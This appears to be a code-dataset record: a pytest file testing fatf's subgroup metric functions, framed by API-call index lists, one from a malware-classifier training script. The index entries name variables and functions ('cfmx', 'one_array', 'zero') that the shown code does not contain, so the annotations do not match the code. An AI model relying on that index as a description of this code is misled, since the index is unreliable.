time\n'), ((4333, 4349), 'configs.add_args', 'add_args', (['parser'], {}), '(parser)\n', (4341, 4349), False, 'from configs import add_args, set_seed\n'), ((5121, 5135), 'configs.set_seed', 'set_seed', (['args'], {}), '(args)\n', (5129, 5135), False, 'from configs import add_args, set_seed\n'), ((5491, 5535), 'models.MalwareModel', 'MalwareModel', (['model', 'config', 'tokenizer', 'args'], {}), '(model, config, tokenizer, args)\n', (5503, 5535), False, 'from models import MalwareModel\n'), ((5850, 5880), 'multiprocessing.Pool', 'multiprocessing.Pool', (['cpu_cont'], {}), '(cpu_cont)\n', (5870, 5880), False, 'import multiprocessing\n'), ((5946, 6000), 'utils.get_filenames', 'get_filenames', (['args.data_dir', 'args.task', 'args.sub_task'], {}), '(args.data_dir, args.task, args.sub_task)\n', (5959, 6000), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((4584, 4609), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (4607, 4609), False, 'import torch\n'), ((4715, 4753), 'torch.cuda.set_device', 'torch.cuda.set_device', (['args.local_rank'], {}), '(args.local_rank)\n', (4736, 4753), False, 'import torch\n'), ((4771, 4808), 'torch.device', 'torch.device', (['"""cuda"""', 'args.local_rank'], {}), "('cuda', args.local_rank)\n", (4783, 4808), False, 'import torch\n'), ((4817, 4869), 'torch.distributed.init_process_group', 'torch.distributed.init_process_group', ([], {'backend': '"""nccl"""'}), "(backend='nccl')\n", (4853, 4869), False, 'import torch\n'), ((5589, 5610), 'models.get_model_size', 'get_model_size', (['model'], {}), '(model)\n', (5603, 5610), False, 'from models import get_model_size\n'), ((6015, 6059), 'os.path.join', 'os.path.join', (['args.output_dir', '"""summary.log"""'], {}), "(args.output_dir, 'summary.log')\n", (6027, 6059), False, 'import os\n'), ((6489, 6590), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.train_filename', 'pool', 'tokenizer', 
'"""train"""'], {'is_sample': '(False)'}), "(args, args.train_filename, pool, tokenizer,\n 'train', is_sample=False)\n", (6516, 6590), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((6839, 6918), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'args.train_batch_size'}), '(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n', (6849, 6918), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((7517, 7603), 'transformers.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'eps': 'args.adam_epsilon'}), '(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.\n adam_epsilon)\n', (7522, 7603), False, 'from transformers import WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup, RobertaConfig, RobertaModel, RobertaTokenizer, BartConfig, BartForConditionalGeneration, BartTokenizer, T5Config, T5ForConditionalGeneration, T5Tokenizer\n'), ((7794, 7920), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': 'warmup_steps', 'num_training_steps': 'num_train_optimization_steps'}), '(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=num_train_optimization_steps)\n', (7825, 7920), False, 'from transformers import WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup, RobertaConfig, RobertaModel, RobertaTokenizer, BartConfig, BartForConditionalGeneration, BartTokenizer, T5Config, T5ForConditionalGeneration, T5Tokenizer\n'), ((3190, 3205), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3203, 3205), False, 'import torch\n'), ((5782, 5814), 'torch.load', 'torch.load', (['args.load_model_path'], {}), '(args.load_model_path)\n', (5792, 5814), False, 'import torch\n'), ((6170, 6198), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (6191, 6198), False, 'import 
torch\n'), ((6386, 6411), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['summary_fn'], {}), '(summary_fn)\n', (6399, 6411), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((6713, 6738), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (6726, 6738), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((6781, 6811), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_data'], {}), '(train_data)\n', (6799, 6811), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((8257, 8309), 'math.ceil', 'math.ceil', (['(train_example_num / args.train_batch_size)'], {}), '(train_example_num / args.train_batch_size)\n', (8266, 8309), False, 'import math\n'), ((12942, 12966), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (12964, 12966), False, 'import torch\n'), ((13611, 13700), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.test_filename', 'pool', 'tokenizer', '"""test"""', '(False)'], {}), "(args, args.test_filename, pool, tokenizer,\n 'test', False)\n", (13638, 13700), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((3949, 3997), 'os.path.join', 'os.path.join', (['args.output_dir', '"""predictions.txt"""'], {}), "(args.output_dir, 'predictions.txt')\n", (3961, 3997), False, 'import os\n'), ((13431, 13447), 'torch.load', 'torch.load', (['file'], {}), '(file)\n', (13441, 13447), False, 'import torch\n'), ((13542, 13570), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (13563, 13570), False, 'import torch\n'), ((4504, 4529), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (4527, 4529), False, 'import torch\n'), ((10027, 10051), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (10049, 10051), False, 'import torch\n'), ((10100, 
10199), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.dev_filename', 'pool', 'tokenizer', '"""valid"""'], {'is_sample': '(False)'}), "(args, args.dev_filename, pool, tokenizer,\n 'valid', is_sample=False)\n", (10127, 10199), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((10612, 10660), 'os.path.join', 'os.path.join', (['args.output_dir', '"""checkpoint-last"""'], {}), "(args.output_dir, 'checkpoint-last')\n", (10624, 10660), False, 'import os\n'), ((14086, 14109), 'io.open', 'open', (['args.res_fn', '"""a+"""'], {}), "(args.res_fn, 'a+')\n", (14090, 14109), False, 'from io import open\n'), ((10688, 10719), 'os.path.exists', 'os.path.exists', (['last_output_dir'], {}), '(last_output_dir)\n', (10702, 10719), False, 'import os\n'), ((10745, 10773), 'os.makedirs', 'os.makedirs', (['last_output_dir'], {}), '(last_output_dir)\n', (10756, 10773), False, 'import os\n'), ((10994, 11044), 'os.path.join', 'os.path.join', (['last_output_dir', '"""pytorch_model.bin"""'], {}), "(last_output_dir, 'pytorch_model.bin')\n", (11006, 11044), False, 'import os\n'), ((11674, 11726), 'os.path.join', 'os.path.join', (['args.output_dir', '"""checkpoint-best-acc"""'], {}), "(args.output_dir, 'checkpoint-best-acc')\n", (11686, 11726), False, 'import os\n'), ((11758, 11784), 'os.path.exists', 'os.path.exists', (['output_dir'], {}), '(output_dir)\n', (11772, 11784), False, 'import os\n'), ((11814, 11837), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (11825, 11837), False, 'import os\n'), ((12038, 12083), 'os.path.join', 'os.path.join', (['output_dir', '"""pytorch_model.bin"""'], {}), "(output_dir, 'pytorch_model.bin')\n", (12050, 12083), False, 'import os\n'), ((14169, 14188), 'utils.get_elapse_time', 'get_elapse_time', (['t0'], {}), '(t0)\n', (14184, 14188), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n')] |
"""
Tests implementations of sub-population model metrics and tools.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
import pytest
import numpy as np
import fatf.utils.metrics.subgroup_metrics as fums
# Exact warning text that fatf emits when some labels are missing from the
# input arrays; the literal '{2}' is part of the message the tests compare
# against verbatim.
MISSING_LABEL_WARNING = ('Some of the given labels are not present in either '
                         'of the input arrays: {2}.')

# 15-row dataset; the middle column ('3', '5' or '7') partitions the rows
# into three sub-groups of sizes 3, 5 and 7 respectively.
DATASET = np.array([['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'],
                    ['0', '5', '0'], ['0', '7', '0'], ['0', '3', '0'],
                    ['0', '5', '0'], ['0', '3', '0'], ['0', '7', '0'],
                    ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'],
                    ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0']])

# Row indices belonging to each sub-group (bins for '3', '5' and '7').
_INDICES_PER_BIN = [[0, 5, 7], [1, 6, 9, 3, 12], [2, 4, 8, 10, 11, 13, 14]]

# Ground-truth labels, assigned bin by bin via the index lists above.
GROUND_TRUTH = np.zeros((15, ), dtype=int)
GROUND_TRUTH[_INDICES_PER_BIN[0]] = [0, 1, 0]
GROUND_TRUTH[_INDICES_PER_BIN[1]] = [0, 1, 2, 1, 0]
GROUND_TRUTH[_INDICES_PER_BIN[2]] = [0, 1, 2, 0, 1, 2, 0]

# Predicted labels, deliberately disagreeing with GROUND_TRUTH on some rows
# so that per-bin accuracy/TPR/TNR values are non-trivial.
PREDICTIONS = np.zeros((15, ), dtype=int)
PREDICTIONS[_INDICES_PER_BIN[0]] = [0, 0, 0]
PREDICTIONS[_INDICES_PER_BIN[1]] = [0, 2, 2, 2, 0]
PREDICTIONS[_INDICES_PER_BIN[2]] = [0, 1, 2, 2, 1, 0, 0]
def test_apply_metric_function():
    """
    Tests :func:`fatf.utils.metrics.subgroup_metrics.apply_metric_function`.
    """
    # Expected error messages for invalid inputs.
    type_error_cmxs = ('The population_confusion_matrix parameter has to be a '
                       'list.')
    value_error_cmxs = ('The population_confusion_matrix parameter cannot be '
                        'an empty list.')
    type_error_fn = ('The metric_function parameter has to be a Python '
                     'callable.')
    attribute_error_fn = ('The metric_function callable needs to have at '
                          'least one required parameter taking a confusion '
                          'matrix. 0 were found.')
    type_error_metric = ('One of the metric function outputs is not a number: '
                         '*{}*.')

    # Metric callables used to probe argument validation.
    def no_required_params():
        return 'zero'  # pragma: nocover

    def constant_metric(one):
        return 0.5

    def sum_metric(one):
        return one.sum()

    def string_metric(one, two):
        return 'one' + '+' + 'two' + ' : ' + two

    confusion_matrix = np.array([[1, 2], [2, 1]])

    # Confusion-matrix list validation.
    with pytest.raises(TypeError) as exception_info:
        fums.apply_metric_function('a', None)
    assert str(exception_info.value) == type_error_cmxs
    with pytest.raises(ValueError) as exception_info:
        fums.apply_metric_function([], None)
    assert str(exception_info.value) == value_error_cmxs

    # Metric-callable validation.
    with pytest.raises(TypeError) as exception_info:
        fums.apply_metric_function([confusion_matrix], None)
    assert str(exception_info.value) == type_error_fn
    with pytest.raises(AttributeError) as exception_info:
        fums.apply_metric_function([confusion_matrix], no_required_params)
    assert str(exception_info.value) == attribute_error_fn

    # Metric callables must return numbers.
    with pytest.raises(TypeError) as exception_info:
        fums.apply_metric_function([confusion_matrix], string_metric,
                                   'second_arg')
    assert str(exception_info.value) == type_error_metric.format(
        'one+two : second_arg')

    # Valid usage: one measure per confusion matrix.
    assert fums.apply_metric_function([confusion_matrix],
                                      constant_metric) == [0.5]
    assert fums.apply_metric_function([confusion_matrix], sum_metric) == [6]
def test_apply_metric():
    """
    Tests :func:`fatf.utils.metrics.subgroup_metrics.apply_metric` function.
    """
    type_error = 'The metric parameter has to be a string.'
    value_error = ('The selected metric (*{}*) is not recognised. The '
                   'following options are available: {}.')
    available_metrics = [
        'true positive rate', 'true negative rate', 'false positive rate',
        'false negative rate', 'positive predictive value', 'accuracy',
        'treatment', 'negative predictive value'
    ]
    cmx = np.array([[1, 2], [3, 4]])

    # The metric selector must be a string...
    with pytest.raises(TypeError) as excinfo:
        fums.apply_metric([cmx], 5)
    assert str(excinfo.value) == type_error
    # ...and one of the recognised metric names.
    with pytest.raises(ValueError) as excinfo:
        fums.apply_metric([cmx], 'unknown_metric')
    assert str(excinfo.value) == value_error.format('unknown_metric',
                                                    sorted(available_metrics))

    # Default metric (accuracy): (1 + 4) / 10.
    measures = fums.apply_metric([cmx])
    assert measures == [0.5]

    # Named metric; label_index selects which class counts as positive.
    measures = fums.apply_metric([cmx], 'true positive rate')
    assert measures == [0.25]
    measures = fums.apply_metric([cmx], 'true positive rate', label_index=1)
    assert len(measures) == 1
    assert measures[0] == pytest.approx(0.667, abs=1e-3)
def test_performance_per_subgroup():
    """
    Tests :func:`fatf.utils.metrics.subgroup_metrics.performance_per_subgroup`.

    Bins DATASET on column 1 and checks the per-bin metric values for the
    default metric, named metrics (with and without extra keyword arguments)
    and custom metric callables (with positional and keyword extras). Every
    call is expected to emit exactly one missing-label warning.
    """
    true_bin_names = ["('3',)", "('5',)", "('7',)"]

    # Default metric
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET, GROUND_TRUTH, PREDICTIONS, 1)
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == pytest.approx([2 / 3, 3 / 5, 5 / 7], abs=1e-3)
    assert bin_names == true_bin_names

    # Named metric
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric='true positive rate')
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == pytest.approx([1, 1, 2 / 3], abs=1e-3)
    assert bin_names == true_bin_names

    # Named metric with **kwargs
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET,
            GROUND_TRUTH,
            PREDICTIONS,
            1,
            metric='true negative rate',
            strict=True)
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == pytest.approx([0, 1 / 3, 3 / 4], abs=1e-3)
    assert bin_names == true_bin_names

    # Custom metric callables: one takes only the confusion matrix, the
    # other also accepts a positional and a keyword extra.
    def one(one):
        return one.sum()

    def two(one, two, three=0):
        return one.sum() + two + three

    # Function metric -- takes the precedence
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET,
            GROUND_TRUTH,
            PREDICTIONS,
            1,
            metric='true negative rate',
            metric_function=one)
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == [3, 5, 7]
    assert bin_names == true_bin_names

    # Function metric with *args
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET,
            GROUND_TRUTH,
            PREDICTIONS,
            1,
            3,
            metric='true negative rate',
            metric_function=two)
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == [6, 8, 10]
    assert bin_names == true_bin_names

    # Function metric with *args and **kwargs
    with pytest.warns(UserWarning) as w:
        bin_metrics, bin_names = fums.performance_per_subgroup(
            DATASET,
            GROUND_TRUTH,
            PREDICTIONS,
            1,
            3,
            metric='true negative rate',
            metric_function=two,
            three=-6)
    assert len(w) == 1
    assert str(w[0].message) == MISSING_LABEL_WARNING
    #
    assert bin_metrics == [0, 2, 4]
    assert bin_names == true_bin_names
def test_performance_per_subgroup_indexed():
    """
    Tests calculating performance per indexed sub-group.
    Tests :func:`fatf.utils.metrics.subgroup_metrics.
    performance_per_subgroup_indexed` function.
    """
    def confusion_sum(confusion_matrix):
        # Custom metric: sum of all confusion-matrix cells.
        return confusion_matrix.sum()

    def confusion_sum_offset(confusion_matrix, offset, three=0):
        # Custom metric exercising extra positional and keyword arguments.
        return confusion_matrix.sum() + offset + three

    # Default metric (accuracy).
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS, labels=[0, 1, 2])
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == pytest.approx([2 / 3, 3 / 5, 5 / 7], abs=1e-3)

    # Metric selected by name.
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS,
            labels=[0, 1, 2], metric='true positive rate')
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == pytest.approx([1, 1, 2 / 3], abs=1e-3)

    # Named metric with extra **kwargs forwarded to it.
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS,
            labels=[0, 1, 2], metric='true negative rate', strict=True)
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == pytest.approx([0, 1 / 3, 3 / 4], abs=1e-3)

    # A metric function takes precedence over a named metric.
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS,
            labels=[0, 1, 2], metric='true negative rate',
            metric_function=confusion_sum)
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == [3, 5, 7]

    # Metric function receiving an extra positional argument.
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS, 3,
            labels=[0, 1, 2], metric='true negative rate',
            metric_function=confusion_sum_offset)
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == [6, 8, 10]

    # Metric function receiving extra positional and keyword arguments.
    with pytest.warns(UserWarning) as warned:
        metrics = fums.performance_per_subgroup_indexed(
            _INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS, 3,
            labels=[0, 1, 2], metric='true negative rate',
            metric_function=confusion_sum_offset, three=-6)
    assert len(warned) == 1
    assert str(warned[0].message) == MISSING_LABEL_WARNING
    assert metrics == [0, 2, 4]
| [
"fatf.utils.metrics.subgroup_metrics.apply_metric",
"fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed",
"pytest.warns",
"fatf.utils.metrics.subgroup_metrics.performance_per_subgroup",
"numpy.zeros",
"pytest.raises",
"numpy.array",
"pytest.approx",
"fatf.utils.metrics.subgroup_met... | [((351, 630), 'numpy.array', 'np.array', (["[['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '5', '0'], ['0',\n '7', '0'], ['0', '3', '0'], ['0', '5', '0'], ['0', '3', '0'], ['0', '7',\n '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'], ['0', '5', '0'\n ], ['0', '7', '0'], ['0', '7', '0']]"], {}), "([['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '5', '0'\n ], ['0', '7', '0'], ['0', '3', '0'], ['0', '5', '0'], ['0', '3', '0'],\n ['0', '7', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'], [\n '0', '5', '0'], ['0', '7', '0'], ['0', '7', '0']])\n", (359, 630), True, 'import numpy as np\n'), ((788, 814), 'numpy.zeros', 'np.zeros', (['(15,)'], {'dtype': 'int'}), '((15,), dtype=int)\n', (796, 814), True, 'import numpy as np\n'), ((986, 1012), 'numpy.zeros', 'np.zeros', (['(15,)'], {'dtype': 'int'}), '((15,), dtype=int)\n', (994, 1012), True, 'import numpy as np\n'), ((2196, 2222), 'numpy.array', 'np.array', (['[[1, 2], [2, 1]]'], {}), '([[1, 2], [2, 1]])\n', (2204, 2222), True, 'import numpy as np\n'), ((2981, 3020), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'one'], {}), '([cfmx], one)\n', (3007, 3020), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3066, 3111), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'one_array'], {}), '([cfmx], one_array)\n', (3092, 3111), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3691, 3717), 'numpy.array', 'np.array', (['[[1, 2], [3, 4]]'], {}), '([[1, 2], [3, 4]])\n', (3699, 3717), True, 'import numpy as np\n'), ((4096, 4121), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]'], {}), '([cfmx])\n', (4113, 4121), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4198, 4245), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""true 
positive rate"""'], {}), "([cfmx], 'true positive rate')\n", (4215, 4245), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4323, 4385), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""true positive rate"""'], {'label_index': '(1)'}), "([cfmx], 'true positive rate', label_index=1)\n", (4340, 4385), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2233, 2257), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2246, 2257), False, 'import pytest\n'), ((2275, 2312), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['"""a"""', 'None'], {}), "('a', None)\n", (2301, 2312), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2369, 2394), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2382, 2394), False, 'import pytest\n'), ((2412, 2448), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[]', 'None'], {}), '([], None)\n', (2438, 2448), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2506, 2530), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2519, 2530), False, 'import pytest\n'), ((2548, 2588), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'None'], {}), '([cfmx], None)\n', (2574, 2588), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2643, 2672), 'pytest.raises', 'pytest.raises', (['AttributeError'], {}), '(AttributeError)\n', (2656, 2672), False, 'import pytest\n'), ((2690, 2730), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'zero'], {}), '([cfmx], zero)\n', (2716, 2730), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2790, 2814), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2803, 2814), False, 'import pytest\n'), ((2832, 2885), 
'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'two', '"""second_arg"""'], {}), "([cfmx], two, 'second_arg')\n", (2858, 2885), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3728, 3752), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (3741, 3752), False, 'import pytest\n'), ((3770, 3798), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '(5)'], {}), '([cfmx], 5)\n', (3787, 3798), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3850, 3875), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3863, 3875), False, 'import pytest\n'), ((3893, 3936), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""unknown_metric"""'], {}), "([cfmx], 'unknown_metric')\n", (3910, 3936), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4442, 4473), 'pytest.approx', 'pytest.approx', (['(0.667)'], {'abs': '(0.001)'}), '(0.667, abs=0.001)\n', (4455, 4473), False, 'import pytest\n'), ((4691, 4716), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (4703, 4716), False, 'import pytest\n'), ((4756, 4824), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {}), '(DATASET, GROUND_TRUTH, PREDICTIONS, 1)\n', (4785, 4824), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4947, 4994), 'pytest.approx', 'pytest.approx', (['[2 / 3, 3 / 5, 5 / 7]'], {'abs': '(0.001)'}), '([2 / 3, 3 / 5, 5 / 7], abs=0.001)\n', (4960, 4994), False, 'import pytest\n'), ((5062, 5087), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (5074, 5087), False, 'import pytest\n'), ((5127, 5229), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], 
{'metric': '"""true positive rate"""'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true positive rate')\n", (5156, 5229), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((5347, 5386), 'pytest.approx', 'pytest.approx', (['[1, 1, 2 / 3]'], {'abs': '(0.001)'}), '([1, 1, 2 / 3], abs=0.001)\n', (5360, 5386), False, 'import pytest\n'), ((5468, 5493), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (5480, 5493), False, 'import pytest\n'), ((5533, 5648), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {'metric': '"""true negative rate"""', 'strict': '(True)'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true negative rate', strict=True)\n", (5562, 5648), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((5826, 5869), 'pytest.approx', 'pytest.approx', (['[0, 1 / 3, 3 / 4]'], {'abs': '(0.001)'}), '([0, 1 / 3, 3 / 4], abs=0.001)\n', (5839, 5869), False, 'import pytest\n'), ((6080, 6105), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (6092, 6105), False, 'import pytest\n'), ((6145, 6268), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {'metric': '"""true negative rate"""', 'metric_function': 'one'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true negative rate', metric_function=one)\n", (6174, 6268), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((6538, 6563), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (6550, 6563), False, 'import pytest\n'), ((6603, 6728), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)', '(3)'], {'metric': '"""true negative rate"""', 'metric_function': 'two'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, 
3,\n metric='true negative rate', metric_function=two)\n", (6632, 6728), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((7025, 7050), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (7037, 7050), False, 'import pytest\n'), ((7090, 7225), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)', '(3)'], {'metric': '"""true negative rate"""', 'metric_function': 'two', 'three': '(-6)'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, 3,\n metric='true negative rate', metric_function=two, three=-6)\n", (7119, 7225), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((7730, 7755), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (7742, 7755), False, 'import pytest\n'), ((7784, 7888), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]'}), '(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2])\n', (7821, 7888), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8007, 8054), 'pytest.approx', 'pytest.approx', (['[2 / 3, 3 / 5, 5 / 7]'], {'abs': '(0.001)'}), '([2 / 3, 3 / 5, 5 / 7], abs=0.001)\n', (8020, 8054), False, 'import pytest\n'), ((8083, 8108), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (8095, 8108), False, 'import pytest\n'), ((8137, 8270), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true positive rate"""'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true positive rate')\n", (8174, 8270), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8437, 8476), 'pytest.approx', 'pytest.approx', (['[1, 1, 2 / 3]'], 
